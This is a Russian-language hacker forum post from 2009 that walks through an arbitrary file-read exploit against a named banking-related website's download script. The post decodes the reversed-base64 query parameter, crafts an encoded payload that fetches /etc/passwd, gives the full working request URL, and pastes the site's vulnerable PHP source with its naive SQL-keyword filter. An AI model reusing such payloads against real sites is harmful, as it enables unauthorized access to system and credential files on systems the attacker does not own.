28.07.2009, 23:07
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Банка,
multibanka.com
Берёт файл, например:
Код:
http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm
Base64!
Декодируем:
Код:
sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif
^_^
Код:
file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu
Делаем по умному /etc/passwd
Код:
/cte/=htap_elif;dwssap=eman_elif
И берём его 
Код:
http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=
такая вот шн*га.
P.S:
get_file.php
PHP код:
include "include_php/my_encoder.php";
decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf')
header('Content-type: application/pdf');
//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));
$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);
echo $data;
my_encoder.php
PHP код:
function encode_str($string) {
return base64_encode(strrev($string));
}
function decode_str($string) {
$result = strrev(base64_decode($string));
// SQL injection tests
if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
Header("Location: http://www.bs.lv/track_hacker.php");
}
$tmp_arr=split(";",$result);
for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
$ta = split("=",$tmp_arr[$i]);
if ($ta['0']) {
$_GET[$ta['0']] = $ta['1'];
}
}
}
|
|
|